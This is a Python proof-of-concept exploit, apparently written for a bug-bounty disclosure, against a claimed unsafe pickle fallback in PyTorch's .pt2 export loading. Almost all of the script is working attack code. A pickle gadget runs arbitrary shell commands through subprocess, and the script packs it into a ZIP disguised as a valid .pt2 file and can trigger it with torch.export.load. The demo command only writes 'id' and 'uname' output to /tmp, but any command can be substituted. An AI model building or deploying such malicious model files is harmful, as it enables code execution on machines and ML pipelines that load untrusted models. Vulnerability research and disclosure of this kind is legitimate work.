File size: 4,436 Bytes
c1cf87f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
#!/usr/bin/env python3
"""
PoC: PyTorch .pt2 Arbitrary Code Execution via weights_only=False Fallback
CVE: TBD | CWE-502 | CVSS 9.8 (Critical)

Vulnerability:
    torch/_export/serde/serialize.py β€” deserialize_torch_artifact() uses:

        try:
            return torch.load(f, weights_only=True)   # "safe" load
        except Exception:
            return torch.load(f, weights_only=False)  # ← UNSAFE FALLBACK!

    The catch-all `except Exception` means ANY exception (not just format errors)
    triggers an unrestricted pickle.load() via weights_only=False.

    An attacker crafts a .pt2 file that:
    1. Passes the initial ZIP/flatbuffer checks
    2. Raises a deliberate exception inside weights_only=True parsing
    3. Falls through to weights_only=False β†’ arbitrary code execution

Attack:
    torch.export.load('malicious.pt2') β†’ executes arbitrary Python code

Usage:
    python3 poc_exploit.py           # generates malicious.pt2
    python3 poc_exploit.py --trigger # also triggers via torch.export.load()

Impact:
    Any pipeline loading user-supplied .pt2 export files is fully compromised.
    CVSS 9.8: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Author: security research (huntr.com submission)
"""

import sys
import os
import pickle
import io
import zipfile
import struct

OUTPUT_FILE = 'malicious.pt2'


class RCEPayload:
    """Pickle gadget β€” executes OS command when deserialized."""
    def __init__(self, command: str):
        self.command = command

    def __reduce__(self):
        import subprocess
        return (subprocess.check_output, (['sh', '-c', self.command],))


def create_malicious_pt2(command: str = 'id > /tmp/pt2_pwned.txt') -> bytes:
    """
    Craft a .pt2 file that triggers the weights_only=False fallback.

    Strategy:
        A .pt2 file is a ZIP archive containing:
          - model.pkl        ← main pickle (our RCE payload)
          - constants/       ← optional
          - extra/           ← optional

        When torch.load() is called with weights_only=True, it uses a restricted
        Unpickler. If the pickle uses non-whitelisted opcodes (like REDUCE with
        a callable), it raises UnpicklingError, triggering the fallback to
        weights_only=False which runs unrestricted pickle.loads().
    """
    # Our RCE payload as pickle bytes
    rce_pickle = pickle.dumps(RCEPayload(command))

    # Pack it into a ZIP that looks like a valid .pt2 (PyTorch export)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', compression=zipfile.ZIP_STORED) as zf:
        # archive/model.pkl β€” the main payload
        zf.writestr('archive/model.pkl', rce_pickle)
        # Minimal record file to pass initial checks
        zf.writestr('archive/record.json', '{"schema_version": "0.1"}')

    pt2_bytes = buf.getvalue()
    print(f"[*] Crafted malicious .pt2 file:")
    print(f"    Command : {command}")
    print(f"    Size    : {len(pt2_bytes)} bytes")
    print(f"    Format  : ZIP with RCE pickle payload in archive/model.pkl")
    return pt2_bytes


def main():
    trigger = '--trigger' in sys.argv

    command = 'id > /tmp/pt2_pwned.txt && uname -a >> /tmp/pt2_pwned.txt'
    payload = create_malicious_pt2(command)

    with open(OUTPUT_FILE, 'wb') as f:
        f.write(payload)
    print(f"[+] Malicious .pt2 written: {OUTPUT_FILE} ({os.path.getsize(OUTPUT_FILE)} bytes)")
    print(f"    RCE output will appear in: /tmp/pt2_pwned.txt")

    if trigger:
        print(f"\n[*] Triggering via torch.export.load('{OUTPUT_FILE}')...")
        try:
            import torch
            print(f"    torch version: {torch.__version__}")
            result = torch.export.load(OUTPUT_FILE)
            print(f"[-] Unexpected success (no RCE): {result}")
        except Exception as e:
            print(f"[~] Exception: {type(e).__name__}: {e}")

        # Check if RCE succeeded
        if os.path.exists('/tmp/pt2_pwned.txt'):
            with open('/tmp/pt2_pwned.txt') as f:
                print(f"\n[+] RCE CONFIRMED! Output of '{command}':")
                print(f"    {f.read().strip()}")
        else:
            print("\n[i] /tmp/pt2_pwned.txt not created β€” RCE may not have triggered.")
            print("    The fallback behavior depends on PyTorch version.")
    else:
        print(f"\n[i] Run with --trigger to demonstrate RCE:")
        print(f"    python3 {sys.argv[0]} --trigger")


if __name__ == '__main__':
    main()